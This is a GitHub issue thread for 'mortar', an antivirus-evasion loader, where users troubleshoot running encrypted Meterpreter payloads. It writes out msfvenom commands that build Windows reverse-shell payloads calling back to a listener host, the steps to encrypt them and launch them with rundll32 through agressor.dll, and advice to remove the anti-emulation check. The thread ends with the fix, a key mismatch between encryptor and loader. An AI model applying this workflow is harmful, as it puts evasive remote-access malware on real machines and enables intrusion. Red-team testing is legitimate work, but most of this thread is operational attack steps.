Can't get shellcode or binary to execute

[nathan-bowman]

I'm running a fresh Windows 10, updated, with all Defender protection disabled for testing.

OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19044 N/A Build 19044

I can't seem to get the shellcode or shell binary to execute.

For example, create shell...

root@localhost:~# msfvenom -p windows/x64/meterpreter/reverse_http LHOST=172.x.x.x LPORT=8080 -f exe -o shell64.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 713 bytes
Final size of exe file: 7168 bytes
Saved as: shell64.exe

At this point, manually executing the binary connects fine: Meterpreter session 1 opened (172.x.x.x:8080 -> 127.0.0.1)

However, encrypting and running with rundll32 doesn't work...

C:\Users\user\Desktop>C:\Users\user\Documents\GitHub\mortar\Encryptor\encryptor.exe -f shell64.exe -o bin.enc
{!} Mortar Evasion Technique - Encryptor Tool
[+] 0xsp.com @zux0x3a

[+] Encrypting the binary ...
[!] content is written to bin.enc

C:\Users\user\Desktop> rundll32.exe agressor.dll,start

At this point, I don't see any network traffic on the victim host.

It appears to trigger werfault.exe

[lawrenceamer]

it works fine with me, make sure you have compiled the DLL correctly and place the bin.enc in the same folder

[lawrenceamer]

i would advise you first to use the following mimikatz first to test if agressor.dll is compiled correctly https://github.com/0xsp-SRD/mortar/tree/main/encrypted-bins, if mimikatz works, maybe some issue on your msfvenom payload which is fine on my side

[nathan-bowman]

it works fine with me, make sure you have compiled the DLL correctly and place the bin.enc in the same folder

How can I double check that the DLL compiled correctly?

It seems to compile, with some errors...

[nathan-bowman]

i would advise you first to use the following mimikatz first to test if agressor.dll is compiled correctly https://github.com/0xsp-SRD/mortar/tree/main/encrypted-bins, if mimikatz works, maybe some issue on your msfvenom payload which is fine on my side

I renamed mimikatz.enc to bin.enc, dropped it in the current working directory with agressor.dll, and ran rundll32.exe agressor.dll,start and rundll32.exe agressor.dll,sh

Both don't work. So, perhaps I'm not compiling agressor.dll properly. Everything seems to compile fine, how can I verify?

[lawrenceamer]

are you sure your project config is like that?

[nathan-bowman]

are you sure your project config is like that?

I just verified, those are the same settings I have.

Windows Application logs shows Event ID 1000 errors.

Faulting application name: rundll32.exe, version: 10.0.19041.746, time stamp: 0xfb4a9a6b
Faulting module name: KERNELBASE.dll, version: 10.0.19041.1706, time stamp: 0x458acb5b
Exception code: 0xe0465043
Fault offset: 0x0000000000034fd9
Faulting process id: 0x71c
Faulting application start time: 0x01d86f86ae713c8e
Faulting application path: C:\Windows\system32\rundll32.exe
Faulting module path: C:\Windows\System32\KERNELBASE.dll
Report Id: ede56f0a-c881-4752-bfc8-9c112894e97e
Faulting package full name: 
Faulting package-relative application ID: 

[lawrenceamer]

in order to see why that's happening on your system, let's try shellcode load not the PE msfvenom -p payload -lhost -lport -f c -o shellcode.bin and then ecnrypt it, then place the bin.enc with aggressor and execute only agressor.sh

[nathan-bowman]

in order to see why that's happening on your system, let's try shellcode load not the PE msfvenom -p payload -lhost -lport -f c -o shellcode.bin and then ecnrypt it, then place the bin.enc with aggressor and execute only agressor.sh

Workflow:

root@localhost:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.x.x.x LPORT=8080 -f c -o shell.c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of c file: 2166 bytes
Saved as: shell.c

C:\Users\user\Documents\GitHub\mortar\Encryptor>encryptor.exe -f \Users\user\Desktop\shell.c -o Users\user\Desktop\bin.enc
{!} Mortar Evasion Technique - Encryptor Tool
[+] 0xsp.com @zux0x3a

[+] Encrypting the binary ...
[!] content is written to \Users\user\Desktop\bin.enc

C:\Users\user\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 749B-11F1

 Directory of C:\Users\user\Desktop

05/24/2022  08:52 AM    <DIR>          .
05/24/2022  08:52 AM    <DIR>          ..
05/24/2022  08:55 AM           850,928 agressor.dll
05/24/2022  09:06 AM             2,888 bin.enc
05/24/2022  10:51 PM             2,166 shell.c

Doesn't work: C:\Users\user\Desktop>rundll32.exe agressor.dll,start

Doesn't work: C:\Users\user\Desktop>rundll32.exe agressor.dll,sh

[lawrenceamer]

I will do the test on all matching OS with a clean system run. if the issue working on my side, maybe your system is not stable or there are other things blocking it. I will keep this issue open for now

[nathan-bowman]

I will do the test on all matching OS with a clean system run. if the issue working on my side, maybe your system is not stable or there are other things blocking it. I will keep this issue open for now

Okay! I'm using libvirt kvm/qemu as a hypervisor. (https://libvirt.org/drvqemu.html)

[lawrenceamer]

yup that's clear now, i have anti-emulator technique(could some memory allocation), so better to try regular PC or VMs

[nathan-bowman]

yup that's clear now, i have anti-emulator technique(could some memory allocation), so better to try regular PC or VMs

It is a VM though... What would be the difference between a VM on VirtualBox or VMWare Workstation vs what I'm using now?

[lawrenceamer]

I think that could be (not 100% sure) due to aggressor.dll not being able to allocate memory correctly, so for example in order to divert the AV emulator, the aggressor will try to see if can allocate or not, if not then exit, and I feel that's what happened in your case if you wanna make sure try to remove the following line and retest again https://github.com/0xsp-SRD/mortar/blob/main/DLL/agressor.lpr#L188

if isEmulated = true  then
  exit
  else

[nathan-bowman]

That didn't help with the crashes

[nathan-bowman]

Same results with Windows 7 :(

[nathan-bowman]

Small update: I installed and updated Windows 10 on Hyper-V. Removed the isEmulated if-statements, set the compiler options to Win64 and x86_64.

And it still doesn't work.

@lawrenceamer What hypervisor are you using?

[lawrenceamer]

try to use the following demo for the test https://github.com/0xsp-SRD/mortar/blob/main/demo/bin.enc then agressor.dll,start

[lawrenceamer]

@nathan-bowman the issue was that you using an encryptor(windows version) which is not what should be, in order to encrypt the files you have to use the Linux version of the encryptor, you can do that by installing Lazarus on Kali

apt install fpc 
apt install Lazarus-ide

after that, you can compile the Encryptor only and use it to encrypt windows binaries

[thedepartedpie]

Its working for https://github.com/0xsp-SRD/mortar/blob/main/demo/bin.enc but not for other payloads encrypted with the crypter

[lawrenceamer]

while using Linux encryptor, it should work any x64 payload, or EXE that's not (.NET Assembly), I have tested mortar with Msfvenom,cobalt also works fine

[nathan-bowman]

while using Linux encryptor, it should work any x64 payload, or EXE that's not (.NET Assembly), I have tested mortar with Msfvenom,cobalt also works fine

The bin.enc you provide does work for me with the agressor.dll I built. Now, trying my own shell...

Build encryptor:

root@localhost:/opt/mortar/Encryptor# lazbuild -r --cpu=x86_64 --os=Linux --verbose encryptor.lpr
Parameter: recursive
Parameter: os=Linux
Parameter: cpu=x86_64
Hint: (lazarus) primary config path: /root/.lazarus
Hint: (lazarus) [TBuildManager.SetBuildTarget] Old=x86_64-linux-gtk2 New=x86_64-linux-gtk2 Changed: OS/CPU=True LCL=False
Hint: (lazarus) [TBuildManager.SetBuildTarget] Old=x86_64-linux-gtk2 New=x86_64-linux-gtk2 Changed: OS/CPU=True LCL=False
Hint: [TPCTargetConfigCache.NeedsUpdate] TargetOS="" TargetCPU="" Options="" compiler file changed "/usr/bin/fpc" FileAge=1574718682 StoredAge=0
Hint: [TPCTargetConfigCache.NeedsUpdate] /usr/bin/fpc TargetOS= TargetCPU= CompilerOptions= ExtraOptions= PATH=/root/.nimble/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/root/.dotnet/tools:/root/go/bin/:/opt/PEzor:/opt/PEzor/deps/donut/:/opt/PEzor/deps/wclang/_prefix_PEzor_/bin/
Hint: (lazarus) [RunTool] "/usr/bin/fpc" "-iWTOTP"
Hint: (lazarus) [RunTool] "/usr/bin/fpc" "-va" "compilertest.pas"
Hint: [TPCTargetConfigCache.Update] has changed
Hint: (lazarus) Build Project: nothing to do.
TCompiler.Compile WorkingDir="/opt/mortar/Encryptor/" CompilerFilename="/usr/bin/fpc" CompilerParams=" -Tlinux -Px86_64 -MObjFPC -Scghi -Cg -O1 -g -gl -l -vewnhibq -Fi/opt/mortar/Encryptor/lib/x86_64-linux -Fu/opt/mortar/Encryptor/ -FU/opt/mortar/Encryptor/lib/x86_64-linux/ -FE/opt/mortar/Encryptor/ -o/opt/mortar/Encryptor/encryptor encryptor.lpr"
[TCompiler.Compile] CmdLine="/usr/bin/fpc -B  -Tlinux -Px86_64 -MObjFPC -Scghi -Cg -O1 -g -gl -l -vewnhibq -Fi/opt/mortar/Encryptor/lib/x86_64-linux -Fu/opt/mortar/Encryptor/ -FU/opt/mortar/Encryptor/lib/x86_64-linux/ -FE/opt/mortar/Encryptor/ -o/opt/mortar/Encryptor/encryptor encryptor.lpr"
Hint: [TPCTargetConfigCache.NeedsUpdate] TargetOS="linux" TargetCPU="x86_64" Options="" compiler file changed "/usr/bin/fpc" FileAge=1574718682 StoredAge=0
Hint: [TPCTargetConfigCache.NeedsUpdate] /usr/bin/fpc TargetOS=linux TargetCPU=x86_64 CompilerOptions= ExtraOptions= PATH=/root/.nimble/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/root/.dotnet/tools:/root/go/bin/:/opt/PEzor:/opt/PEzor/deps/donut/:/opt/PEzor/deps/wclang/_prefix_PEzor_/bin/
Hint: (lazarus) [RunTool] "/usr/bin/fpc" "-iWTOTP" "-Px86_64" "-Tlinux"
Hint: (lazarus) [RunTool] "/usr/bin/fpc" "-va" "compilertest.pas" "-Px86_64" "-Tlinux"
Hint: [TPCTargetConfigCache.Update] has changed
Hint: (lazarus) TBuildManager.MacroFuncInstantFPCCache /usr/bin/instantfpc
Hint: (lazarus) [RunTool] "/usr/bin/instantfpc" "--get-cache"
Hint: (lazarus) [TBuildManager.MacroFuncInstantFPCCache] /root/.cache/instantfpc/
Info: (lazarus) Execute Title="Compile Project, Target: encryptor"
Info: (lazarus) Working Directory="/opt/mortar/Encryptor/"
Info: (lazarus) Executable="/usr/bin/fpc"
Info: (lazarus) Param[0]="-B"
Info: (lazarus) Param[1]="-Tlinux"
Info: (lazarus) Param[2]="-Px86_64"
Info: (lazarus) Param[3]="-MObjFPC"
Info: (lazarus) Param[4]="-Scghi"
Info: (lazarus) Param[5]="-Cg"
Info: (lazarus) Param[6]="-O1"
Info: (lazarus) Param[7]="-g"
Info: (lazarus) Param[8]="-gl"
Info: (lazarus) Param[9]="-l"
Info: (lazarus) Param[10]="-vewnhibq"
Info: (lazarus) Param[11]="-Fi/opt/mortar/Encryptor/lib/x86_64-linux"
Info: (lazarus) Param[12]="-Fu/opt/mortar/Encryptor/"
Info: (lazarus) Param[13]="-FU/opt/mortar/Encryptor/lib/x86_64-linux/"
Info: (lazarus) Param[14]="-FE/opt/mortar/Encryptor/"
Info: (lazarus) Param[15]="-o/opt/mortar/Encryptor/encryptor"
Info: (lazarus) Param[16]="encryptor.lpr"
Hint: (11030) Start of reading config file /etc/fpc.cfg
Hint: (11031) End of reading config file /etc/fpc.cfg
Free Pascal Compiler version 3.0.4+dfsg-23 [2019/11/25] for x86_64
Copyright (c) 1993-2017 by Florian Klaempfl and others
(1002) Target OS: Linux for x86-64
(3104) Compiling encryptor.lpr
/opt/mortar/Encryptor/encryptor.lpr(101,3) Note: (5025) Local variable "de" not used
/opt/mortar/Encryptor/encryptor.lpr(102,6) Note: (5025) Local variable "s2" not used
/opt/mortar/Encryptor/encryptor.lpr(103,7) Note: (5025) Local variable "temp" not used
/opt/mortar/Encryptor/encryptor.lpr(104,3) Note: (5025) Local variable "i" not used
/opt/mortar/Encryptor/encryptor.lpr(98,10) Warning: (5033) Function result does not seem to be set
/opt/mortar/Encryptor/encryptor.lpr(146,43) Hint: (5091) Local variable "b64_encoded" of a managed type does not seem to be initialized
(9015) Linking /opt/mortar/Encryptor/encryptor
/usr/bin/ld.bfd: warning: /opt/mortar/Encryptor/link.res contains output sections; did you forget -T?
(1008) 173 lines compiled, 0.3 sec
(1021) 1 warning(s) issued
(1022) 3 hint(s) issued
(1023) 4 note(s) issued
[TCompiler.Compile] end

Build reverse shell:

root@localhost:/opt/mortar/Encryptor# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.x.x.x LPORT=8080 --platform windows --arch x64 -f exe -o /root/shell64.exe
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: /root/shell64.exe

Test from target Win10:

[*] Meterpreter session 121 opened (172.x.x.x:8080 -> x.x.x.x:20099) at 2022-05-27 14:18:57 +0000

Encrypt:

root@localhost:/opt/mortar/Encryptor# ./encryptor -f /root/shell64.exe -o /root/bin.enc
{!} Mortar Evasion Technique - Encryptor Tool
[+] 0xsp.com @zux0x3a

[+] Encrypting the binary ...
[!] content is written to /root/bin.enc

Both of these fail on target Win10:

C:\Users\user\Desktop>rundll32.exe agressor.dll,start
C:\Users\user\Desktop>rundll32.exe agressor.dll,sh

[jad017]

I have the same issue. It works well with the demo/bin.enc but not with my own payload

[lawrenceamer]

it works with meterpreter, at some times you need to execute it 3/4 times to make sure it is being executed on memory,

[lawrenceamer]

as I said there are no issues on the mortar side, it is a kind of memory execution delays or could take time to be allocated with executable shellcode or an image, if it fails the first time, execute it 3/4 times to make it work

[nathan-bowman]

as I said there are no issues on the mortar side, it is a kind of memory execution delays or could take time to be allocated with executable shellcode or an image, if it fails the first time, execute it 3/4 times to make it work

How exactly are you compiling encryptor?

Like? lazbuild -r --cpu=x86_64 --os=Linux --verbose encryptor.lpr

[lawrenceamer]

pushed the compiled version of encryptor https://github.com/0xsp-SRD/mortar/releases/tag/v2

[nathan-bowman]

pushed the compiled version of encryptor https://github.com/0xsp-SRD/mortar/releases/tag/v2

That works! How are you compiling it? I'm using: lazbuild -r --cpu=x86_64 --os=Linux --verbose encryptor.lpr

[nathan-bowman]

pushed the compiled version of encryptor https://github.com/0xsp-SRD/mortar/releases/tag/v2

That works! How are you compiling it? I'm using: lazbuild -r --cpu=x86_64 --os=Linux --verbose encryptor.lpr

^^^ @lawrenceamer can you post how you are compiling the encryptor?

[goofsec]

Please ensure your keys match inside agressor.lpr and encryptor.lpr. The current version on GitHub uses two different keys for encrypting and decrypting. That's why the shellcode won't run. See also https://github.com/0xsp-SRD/mortar/pull/21

[nathan-bowman]

Please ensure your keys match inside agressor.lpr and encryptor.lpr. The current version on GitHub uses two different keys for encrypting and decrypting. That's why the shellcode won't run. See also #21

This makes sense, I'll test later. If I don't reply again, it probably means that it worked.